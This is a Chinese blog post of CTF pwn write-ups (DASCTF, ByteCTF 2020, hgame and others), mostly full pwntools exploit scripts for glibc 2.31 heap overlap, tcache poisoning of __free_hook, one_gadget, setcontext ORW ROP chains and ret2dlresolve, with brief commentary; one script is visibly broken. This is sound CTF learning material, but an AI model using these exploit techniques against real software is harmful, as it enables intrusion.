题单做一做

最新推荐文章于 2024-09-24 08:48:12 发布
最新推荐文章于 2024-09-24 08:48:12 发布
阅读量267 收藏
点赞数
文章标签: 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_61283545/article/details/127154475
版权

2022dasctf9月

note

from pwn import*
p=process("./pwn")
#p=remote("node4.buuoj.cn",26178)
context(log_level="Debug",terminal=["tmux","splitw","-h"])
libc=ELF("libc-2.31.so")
choice = lambda x:p.sendlineafter(b'Your choice:',str(x).encode())
def add(size,payload):
    choice(1)
    size = 0x100000000 | size
    p.sendafter(b'Note size:',str(size).encode())
    p.sendafter(b'Note content:',payload)

def free(idx):
    choice(2)
    p.sendlineafter(b'Note ID:',str(idx).encode())

def show(idx):
    choice(3)
    p.sendlineafter(b'Note ID:',str(idx).encode())

add(0x90,'a'*0x90)
add(0x80,'a'*0x10)
add(0x80,'a'*0x10)#2
add(0xf0,'a'*0x10)#3
add(0xf0,'a'*0x10)#4
add(0xf0,'a'*0x10)#5
add(0xf0,'a'*0x10)#6
add(0xf0,'a'*0x10)

free(0)
add(0x90,'a'*0x90+p64(0)+p64(0x521))
free(1)
add(0x80,'a'*0x10)
show(2)
libc_base=u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))-0x1ebbe0
free_hook=libc.symbols["__malloc_hook"]+libc_base
system=libc_base+libc.symbols["system"]

onegadget=libc_base+0xe6af1
free(4)
free(3)
free(0)
add(0x90,'a'*0x90+p64(0)+p64(0x91)+'a'*0x80+p64(0)+p64(0x491)+p64(0x00007fdadd6e9be0)*2+'a'*0x70+p64(0)+p64(0x101)+p64(free_hook))

add(0xf0,'a')
add(0xf0,p64(system))

#free(5)
#add(0xf0,"/bin/sh\x00")
#add(0x80,'b')

print(hex(free_hook))
gdb.attach(p)
p.interactive()

题目不难关键在于审题,看到一堆unsigned int和int就想整形溢出,事实也确实是malloc时候unsigned整形溢出,构成堆重叠。之后也挺常规的

bar

from pwn import*
#p=remote("node4.buuoj.cn",26315)
p=process("./bar")
elf=ELF('libc-2.31.so')
context(os='linux',arch='amd64',terminal=['tmux','splitw','-h'])
libc=ELF('libc-2.31.so')

s=lambda x:p.send(x)
sa=lambda x,y:p.sendafter(x,y)
sl=lambda x:p.sendline(x)
sla=lambda x,y:p.sendlineafter(x,y)
r=lambda x:p.recv(x)
ru=lambda x:p.recvuntil(x)
debug=lambda:gdb.attach(p)	

choose=lambda x:sla(b"Your choice:",str(x))

def add(size,content):
    choose(1)
    sla("Whisky , brandy or Vodka?",str(size))
    sla("You may want to tell sth to the waiter:",content)

def free(idx,num):
    choose(2)
    sla("Which?",str(idx))
    sla("How much?",str(num))

choose(3)

ru('0x')
libc_base=int(r(12),16)-0x1ec6a0
onegadget=libc_base+0xe6af1
freehook=libc_base+libc.sym['__malloc_hook']
""" 0xe6aee execve("/bin/sh", r15, r12)
constraints:
  [r15] == NULL || r15 == NULL
  [r12] == NULL || r12 == NULL

0xe6af1 execve("/bin/sh", r15, rdx)
constraints:
  [r15] == NULL || r15 == NULL
  [rdx] == NULL || rdx == NULL

0xe6af4 execve("/bin/sh", rsi, rdx)
constraints:
  [rsi] == NULL || rsi == NULL
  [rdx] == NULL || rdx == NULL """



add(0,'0')
add(0,'1')#
add(2,'2')
add(2,'3')
add(1,'4')#0x100
add(2,'5')
add(2,'6')
add(1,'7')#0x100
add(0,'8')
add(2,'9')
add(2,'a')

free(0,0x100)
add(0,'\0'*0xf8+p64(0x471))

free(1,0x100)
free(2,0x40)
free(3,0x40)


add(0,'a'*0x10)
add(0,p64(0)*7+p64(0x51)+p64(freehook-0x10))

add(2,'a')
add(2,p64(onegadget))

#free(6,0x40)
add(0,'a')

print(hex(freehook))
#gdb.attach(p)
p.interactive()

题目不难关键在于没有edit情况下切割unsortbin以达到覆盖效果构成重叠我是伪造了一个unsortbin来做的官方wp还可以伪造unsortbin和tcache来做,但我感觉其实并不太好

总结一下,做完9月,nameless师傅出的题都没有特别考察glibc,我感觉很不错。之后着重转向调试glibc了

reverse1

看着挺有意思的研究了一下这道题

 按照正常逻辑只能接触fake flag,程序的关键在于fun1函数下的fun2 _cxa_allocate_exception,引用一下知乎上的解释

简化的exception处理流程(从throw到catch):

  • 调用__cxa_allocate_exception分配空间存放exception object和exception header __cxa_exception
  • 跳转到__cxa_throw,设置__cxa_exception字段后跳转到_Unwind_RaiseException
  • _Unwind_RaiseException执行search phase,调用personality查找匹配的try catch(类型匹配)
  • _Unwind_RaiseException执行cleanup phase:调用personality查找包含out-of-scope变量的stack frames,对于每个stack frame,跳转到其landing pad执行destructors。该landing pad用_Unwind_Resume跳转回cleanup phase
  • _Unwind_RaiseException执行的cleanup phase跳转到匹配的try catch对应的landing pad
  • 该landing pad调用__cxa_begin_catch,执行catch代码,然后调用__cxa_end_catch
  • __cxa_end_catch销毁exception object

问题便变成了从throw找catch处理异常代码,跟进_cxa_throw,可以发现_cxa_begin_catch,这便是正确的catch位置这时候以汇编窗口打开,对_cxa_begin_catch进行溯源查找调用它的函数按x

查找,经过查找mian+158,就找到正确的函数

bytectf2020

easyheap

这题我一开始想的是利用v2的任意地址写0之后,改变tcache指向free_hook之后调用one_gadget

实际onegadget不太行只有老老实实sys bin,具体注意的点就算切割unsotrbin malloc0留下地址leak libc,我们构造tache指针重叠时候主要我们修改的指针连表必须后面至少还有两个tachce占为否则我们申请free——hook时候会申请不出来。

from pwn import*
p=process("./easyheap")
context(log_level="Debug",terminal=["tmux","splitw","-h"])
libc=ELF("/home/sohaha/glibc-all-in-one/libs/2.31-0ubuntu9_amd64/libc-2.31.so")
def cho(num):
    p.sendlineafter(">> ",str(num))
 
def exadd(v2,size,con):
    cho(1)
    p.sendlineafter("Size: ",str(v2))
    p.sendlineafter("Size: ",str(size))
    p.sendlineafter("Content: ",con)
 
def add(size,con):
    cho(1)
    p.sendlineafter("Size: ",str(size))
    p.sendlineafter("Content: ",con)
 
def show(index):
    cho(2)
    p.sendlineafter("Index: ",str(index))
 
def delete(index):
    cho(3)
    p.sendlineafter("Index: ",str(index))


for i in range(0,8):
    add(0x80,'aaaaaaaa')
for i in range(0,7):
    delete(7-i)
delete(0)

exadd(0x361,0x1,'\xe0')
show(0)

libc_base=u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))-0x1ebc61-2-0x7d
print(hex(libc_base))
""" constraints:
  [r15] == NULL || r15 == NULL
  [r12] == NULL || r12 == NULL

0xe6af1 execve("/bin/sh", r15, rdx)
constraints:
  [r15] == NULL || r15 == NULL
  [rdx] == NULL || rdx == NULL
0xe6af4 execve("/bin/sh", rsi, rdx)
constraints:
  [rsi] == NULL || rsi == NULL
  [rdx] == NULL || rdx == NULLs
 """
one_gadget=libc_base+0xe6aee
free_hook=libc_base+libc.sym["__free_hook"]
system=libc_base+libc.sym["system"]
print(hex(free_hook))

###########################################################################
#for i in range(0,5):
#    add(0x80,'bbbbbbbb')
#add(0x80,p64(free_hook))
#add(0x80,"/bin/sh\x00")
#add(0x80,p64(system))#其实可以利用原来申请的0x80构造,但是如过这样肯定要重新布置堆块了较麻烦

##########################################################################
add(0x70,'bcbcbcbc')
add(0x60,"bcbcbcbc")
add(0x50,'adadadad')
add(0x50,'adadadad')
add(0x50,'adadadad')

delete(3)
delete(5)
delete(4)

exadd(-0xbf,0x40,"/bin/sh\x00")
add(0x50,p64(free_hook))

add(0x50,"/bin/sh\x00")
add(0x50,p64(system))

delete(5)
########################################################################




print(hex(free_hook))
gdb.attach(p)
p.interactive()

gun

这题也挺有意思的,解题关键在于发现malloc的时候堆没有初始化,free的时候没有删去指针,而且本题特殊的load形式先把对块上链表之后再free但是load链表却没有初始化和释放的时候把next指针归零(这个看了好久没看出来,真的挺利害的),导致我们可以uaf构造重叠,同时开了沙箱,以前我也没做过setcontext的题确实是长见识了

from pwn import*
p=process("./gun")
context(log_level="debug",terminal=["tmux","splitw","-h"])
libc=ELF("libc-2.31.so")
p.recvuntil("Your name: ")
payload='adadadad'
p.sendline(payload)

def cho(num):
    p.sendlineafter("Action> ",str(num))
 
def buy(size,con):
    cho(3)
    p.sendlineafter("Bullet price: ",str(size))
    p.sendlineafter("Bullet Name: ",con)
 
def load(index):
    cho(2)
    p.sendlineafter('load?',str(index))
 
def shoot(time):
    cho(1)
    p.sendlineafter('time: ',str(time))

buy(0x500,'a'*0x10)
buy(0x20,'a'*0x10)
load(0)
shoot(1)

buy(0x20,'a')
load(0)
shoot(1)

libc_base=u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))-0x1ebf61-0x100
malloc_hook=libc_base+libc.symbols["__malloc_hook"]
setcontext=libc_base+libc.symbols["setcontext"]+61
free_hook=libc_base+libc.symbols["__free_hook"]


buy(0x30,'a')#0
buy(0x30,'a')#2

load(0)
load(2)
shoot(2)

buy(0x30,'\x0a')
load(0)
shoot(1)
p.recvuntil("Pwn! The ")
elf_base=u64(p.recv(6).ljust(8,"\x00"))-0x340
#print(hex(elf_base))

pdt=libc_base+0x26b72 ##pop_rdi_ret
pat=libc_base+0x4a550 ##pop_rax_ret
pst=libc_base+0x27529 ##pop_rsi_ret
pd12t=libc_base+0x11c1e1 ##pop_rdx_r12_ret
sys_ret=libc_base+0x66229 ##syscall_ret

#print(hex(pdt))
def syscall(num,a1,a2,a3):
    pd=p64(pat)+p64(num)+p64(pdt)+p64(a1)+p64(pst)+p64(a2)+p64(pd12t)+p64(a3)+p64(0)+p64(sys_ret)
    return pd

#print(hex(elf_base))
target=0x410+elf_base

 
#0 1 2 3 4 5 6 7 
load(1)
shoot(1)

for i in range(9):
    buy(0x20,'a')

for i in range(9):
    load(8-i)
shoot(9)


for i in range(7):
    buy(0x20,'b')

for i in range(6):
    load(5-i)
shoot(8)

for i in range(7):
    buy(0x20,'a')

rop=syscall(2,target+0x10,0,0)+syscall(0,3,target+0x10,0x40)+syscall(1,1,target+0x10,0x40)
padding='./flag\x00\x00'+p64(target)+p64(setcontext)+'a'*0x78+p64(target+0xb0)+rop

buy(0x200,'s')
buy(0x20,p64(free_hook))

buy(0x20,'a')
buy(0x20,'a')
buy(0x20,p64(libc_base+0x1547a0))

load(7)
shoot(1)

""" #double free
for i in range(8):
    buy(0x68,'b')

load(0)
load(2)
load(3)
load(4)
load(5)
load(6)
load(7)
load(8)
shoot(8)


load(1)
shoot(2)

orw_base=elf_base+0x100
pop_rdi=0x0000000000001bd3
pop_rsi_r15=0x0000000000001bd1
 """

""" orw=p64(pop_rdi)+p64(flag_addr)
orw+=p64(pop_rsi_r15)+p64(0)+p64(0)
orw+=p64(pop_rax)+p64(2)
orw+=p64(syscall_ret)
orw+=p64(pop_rdi)+p64(3)
orw+=p64(pop_rsi_r15)+p64(elf_base+0x40)
orw+=p64(pop_rdx)+p64(0x100)
orw+=p64(pop_rax)+p64(0)
orw+=p64(syscall_ret)
orw+=p64(pop_rdi)+p64(1)
orw+=p64(pop_rsi_r15)+p64(elf_base+0x40)+p64(0)
orw+=p64(pop_rdx)+p64(0x100)
 """




print(hex(free_hook))
gdb.attach(p)
p.interactive()

1.ret2ret2dlresolve

这道题类型算是第一次遇见还挺有意思的

参考【技术分享】借助DynELF实现无libc的漏洞利用小结-安全客 - 安全资讯平台

from pwn import *

p = process('./c1')
elf = ELF('./c1')
write = elf.plt['write']
read  = elf.plt['read']
bss = elf.bss(0x2C)
main = 0x80484be
pppt = 0x0804856c
offset = 112

def leak(address):
    p.recvuntil('Welcome to XDCTF2015~!\n')
    payload = "A" * 112 + p32(write) + p32(main) + p32(1) + p32(address) + p32(4)
    p.send(payload)
    data = p.recv(4)
    log.debug("%#x => %s" % (address, (data or '').encode('hex')))
    return data
d = DynELF(leak, elf = elf)
systemAddress = d.lookup('system', 'libc')
payload = 'A' * 112 + p32(read) + p32(pppt) + p32(0) + p32(bss) + p32(0x2C) + p32(systemAddress) + p32(main) + p32(bss)
p.send(payload)
payload = "/bin/sh\00"
p.send(payload)
p.interactive()

1.hgame babygame

rom pwn import*
from ctypes import*
p=process("./babygame")
libc=ELF("libc-2.31.so")
elf=ELF("./libc-2.31.so")
p.recvuntil("Please input your name:")
context(arch="amd64",log_level="debug",os='linux',terminal=['tmux','splitw','-h'])

libc=cdll.LoadLibrary("./libc-2.31.so")
libc.srand(0x1111111111111111)

payload=('\x11'*0x109)
p.sendline(payload)
p.recvuntil("\x11"*0x109)
cannary=u64(p.recv(7).rjust(8,'\x00'))
print(hex(cannary))
stack=u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))

print(hex(stack))

#gdb.attach(p)

for i in range(100):
    v2=libc.rand()%3
    if v2==0:
        v3=1
    if v2==1:
        v3=2
    if v2==2:
        v3=0
    p.recvuntil(': \n')
    p.sendline(str(v3))

#gdb.attach(p,"b 0x7f408657bfca")
gdb.attach(p)
p.recvuntil("Good luck to you.\n")


payload='%42178c%9$hn'+'aaaa'+'%27$p'+'aaa'+p64(leak_addr-520)
   
p.send(payload)
sleep(0.2)
p.recvuntil('\x78')
atoi_addr=int(p.recv(12),16)-16
libc_base=atoi_addr-lib.sym['atoi']
print('libc_base')
print(hex(libc_base))
sys_addr=lib.symbols['system']+libc_base
bin_sh_addr=lib.search('/bin/sh').next()+libc_base
payload2=0x108*'a'+p64(canary)+'b'*0x18+p64(0x4f302 +libc_base)
p.send(payload2)
sleep(0.2)
p.send('0')
p.interactive()

#gdb.attach(p)
p.interactive()

开幕雷击第一题就调炸了,换了各种脚本尝试跑了以下乌各自libc总是对不上,现放着后面再来。

 

osahha
关注
C++ 异常是如何实现的
fcsfcsfcs的博客
09-04 1679
本文内容主要来源于C++ exceptions under the hood,环境为 gcc/x86,原文非常长且专注于实现自己的异常机制,感兴趣可以看原文,本文只针对于原理介绍与术语讲解。 1、太长不看版总结 编译器会将throw语句翻译成一对libstdc++库里的函数,包括为异常处理分配内存、调用libstdc来进行栈展开(stack unwinding)。 对于每个catch语句的存在,编译器会在函数末尾加上一些特殊信息,包括当前函数可以捕获的异常表,以及清理表(cleanu...
DASCTF X CBCTF 2022九月挑战赛 reverse landing
weixin_63051469的博客
09-22 690
胡小楠的刷题日常
2020 湖湘杯 PWN WriteUp
SkYe's Blog
11-11 737
比赛的时候出去玩了,这就来复盘 babyheap 基本情况 增删查改,数量限制比较宽松挺大的,大小固定 0xf8 。 漏洞 safe_read 写入大小为 0xf8 会溢出修改下一个 chunk size 最低两位为 \x00 。 char *__fastcall safe_read(char *ptr, int size) { char *result; // rax read(0, ptr, 0xF0uLL); result = &ptr[size]; .
JavaScript实现一个在线题测试网页
李俊标的博客
03-30 2万+
很简单的一个需求,看一下完成的效果图;接下来是代码<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>text online</title> <meta http-equiv="cont
前端最全面试题
热门推荐
吴小迪的博客
05-04 15万+
今天给朋友们分享一到三年前端最全的面试题。 JS基础题: JS的数据类型有哪些? 答案见:JS数据类型详解 如何判断JS变量的数据类型? typeof() instanceof constructor toString typeof求解的可能值有哪些? “number” “string” “boolean” “undefined” “object” “symbol” “function”...
Vue一到三年面试题总结
吴小迪的博客
08-11 9万+
笔者粉丝群里的朋友们多部分的人都在找vue的工作而没有再找react工作,所以我之前总结的html,css,js,react面试题还不行,还要继续拓展vue的。。于是我就把大家在出去面试的时候遇到的vue面试题以粉丝们投稿的方式收集了起来个汇总,希望能帮助到更多的朋友们~ Vue面试题正文: 1.vue全家桶包含哪些? 答案:vue全家桶与react全家桶介绍 2.v-model是什么?怎么使...
Java后端真实面试题大全(有详细答案)--高频/真题
IT利刃出鞘的博客
11-24 14万+
本文分享Java后端真实高频面试题,有详细答案,保你稳过面试。题目包括:Java基础、多线程、JVM、数据库、Redis、Shiro、Spring、SpringBoot、MyBatis、MQ、ELK、SpringCloud、设计模式等。 本博客包含从简单到困难、从高频到低频的题目,适合所有Java求职者,包括:刚入门的、三年以内经验、三到五年经验、五到十年经验等。
pmp每日一题
weixin_41643133的博客
12-25 3万+
2019.12.25 每日一题: You are a project manager of a company and your project is currently in execution phase.The customer has requested you for additional work. This work will affect the budget, but not t...
极具参考价值的Python面试题!从创业公司到一线大厂的真实面经汇总(持续更新)
吴秋霖的博客
04-21 4万+
全网极具参考价值的Python面试题,从创业公司到一线大厂的面经汇总整理。作者会持续维护更新!
数学一年级应用题_一年级训练思维的数学应用题五十道,含答案解析
weixin_35828338的博客
12-24 8312
一年级训练思维的数学应用题五十道,含答案解析2019-09-28 15:53:16学习数学最重要是思维,本文为小学一年的学生准备了五十道数学思维题,含答案及解析,家长可以拿来让孩子进行训练思维,但强调不要让孩子刷题,注意让孩子劳逸结合。1、哥哥4个苹果,姐姐有3个苹果,弟弟有8个苹果,哥哥给弟弟1个后,弟弟吃了3个,这时谁的苹果多?答:姐姐的苹果不变仍然是3个,哥哥有4-1=3(个)苹果,弟弟有8...
2024年Unity 面试题 |五萬字 二佰道| Unity面试题大全,面试题总结【全网最全,收藏一篇足够面试】
努力前行,总会成为自己心中的那道光
02-23 12万+
正所谓 金三银四 ,又到了找工作的大好时机了,不知道大家有没有意向找一份更好的工作呢~ 之前写了很多Unity的学习和实例文章,但是面试题部分还没有一个系统的整理。 那本篇文章就来整理一下Unity中一些常见的面试题,说不准就会面试的时候就会遇到! 本篇文章会将Unity所有方面的面试资料都融会贯通,绝对是2022年Unity面试领域最实用的文章啦!
python一个单项选择题系统_(完整版)python选择题word打印版
weixin_39614521的博客
11-26 2172
Python单选题库一、python语法基础1、Python 3.x版本的保留字总数是A.27B.29C.33D.162.语言保留字的是Python不是,以下选项中A whileB passC doD except3.以下选项中描述错误的是,程序格式框架Python关于A Python语言不采用严格的“缩进”来表明程序的格式框架B Python单层缩进代码属于之前最邻近的一行非缩进代码,多层缩进代...
2024年06月CCF-GESP编程能力等级认证C++编程一级真题解析
人生就是一个不断学习的过程
07-09 2922
小杨计划在某个时刻开始学习,并决定在学习 秒后开始休息。 小杨想知道自己开始休息的时刻是多少。
oj题c语言
Hello大家好,我是Dream,如果帮得到你,那我深感荣幸!交流学习、商务合作:https://bbs.csdn.net/topics/614347534
08-18 2万+
输入两个整数A,B,用空格隔开输出一个整数,表示这两个数的和数据范围0≤A,B≤108。
网站建设中常见的网站后台开发语言有哪几种,各自优缺点都是什么?
2301_80154636的博客
09-24 1983
总的来说,每种语言都有其特定的优势和局限,选择哪种语言取决于项目需求、团队技能和预期的维护成本等多种因素。理解这些语言的核心特性和适用场景可以帮助开发出更明智的选择,从而有效提升项目的成功率和开发效率。这些语言各有其独特的优缺点,适用于不同的开发场景和需求。市场上常见的网站后台开发语言有。
WxParse-微信小程序富文本解析自定义组件,支持HTML和markdown解析.zip
10-04
WxParse-微信小程序富文本解析自定义组件,支持HTML和markdown解析
江苏科技大学在辽宁2020-2024各专业最低录取分数及位次表.pdf
10-04
那些年,与你同分同位次的同学都去了哪里?全国各大学在辽宁2020-2024年各专业最低录取分数及录取位次数据,高考志愿必备参考数据
Chartjs微信小程序改编_Chartjs-wecat-mini-app.zip
10-04
Chartjs微信小程序改编_Chartjs-wecat-mini-app
kindeditor-4.1.12.zip
最新发布
10-04
网上好不容易找到的,特此分享。
bzoj题计划 excel
07-16
### 回答1: bzoj作为一个计算机竞赛的在线评测系统,不仅可以提供大量的题目供程序员练习和学习,还可以帮助程序员提升算法和编程能力。为了更好地利用bzoj进行题目的学习和刷题,制定一个bzoj题计划是非常有必要的。 首先,我们需要合理安排时间,每天留出一定的时间来bzoj的题目。可以根据自己的时间安排,每天挑选适量的题目进行解答。可以先从难度较低的题目开始,逐渐提高难度,这样既能巩固基础知识,又能挑战自己的思维能力。 其次,要有一个计划和目标。可以规划一个每周或每月的题目数量目标,以及每个阶段要学习和掌握的算法知识点。可以根据bzoj的题目分类,如动态规划、图论、贪心算法等,结合自己的实际情况,有针对性地选择题目进行学习。 此外,要充分利用bzoj提供的资源。bzoj网站上有很多高质量的题解和优秀的解题代码,可以参考和学习。还有相关的讨论区,可以与其他程序员交流和讨论,共同进步。 最后,要坚持并保持思考。题不是单纯为了刷数量,更重要的是学会思考和总结。遇到难题时,要有耐心,多思考,多尝试不同的解法。即使不能一次性解出来,也要学会思考和分析解题过程,以及可能出现的错误和优化。 总之,bzoj题计划的关键在于合理安排时间、制定目标、利用资源、坚持思考。通过有计划的刷题,可以提高算法和编程能力,并培养解决问题的思维习惯,在计算机竞赛中取得更好的成绩。 ### 回答2: bzoj题计划是指在bzoj这个在线测评系统上制定一套学习和刷题的计划,并且将计划记录在excel表格中。该计划主要包括以下几个方面的内容。 首先是学习目标的设定。通过分析自己的水平和知识缺口,可以设定一个合理的目标,比如每天解决一定数量的题目或者提高特定的算法掌握程度。 其次是题目选择的策略。在excel表格中可以记录下自己选择的题目编号、题目类型和难度等信息。可以根据题目的类型和难度来安排每天的刷题计划,确保自己可以逐步提高技巧和解题能力。 然后是学习进度的记录和管理。将每天的完成情况记录在excel表格中,可以清晰地看到自己的学习进度和任务完成情况。可以使用图表等功能来对学习进度进行可视化展示,更好地管理自己的学习计划。 同时,可以在excel表格的备注栏中记录下每道题目的解题思路、关键点和需要复习的知识点等信息。这样可以方便自己回顾和总结,巩固所学的知识。 最后,可以将excel表格与其他相关资料进行整合,比如算法教材、题目解析和学习笔记等。这样可以形成一个完整的学习档案,方便自己进行系统的学习和复习。 总之,bzoj题计划excel的制定和记录可以帮助我们更加有条理和高效地进行学习和刷题。通过合理安排学习目标和题目选择策略,记录学习进度和思路,并整合其他学习资料,我们可以提高自己的解题能力,并在bzoj上取得更好的成绩。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值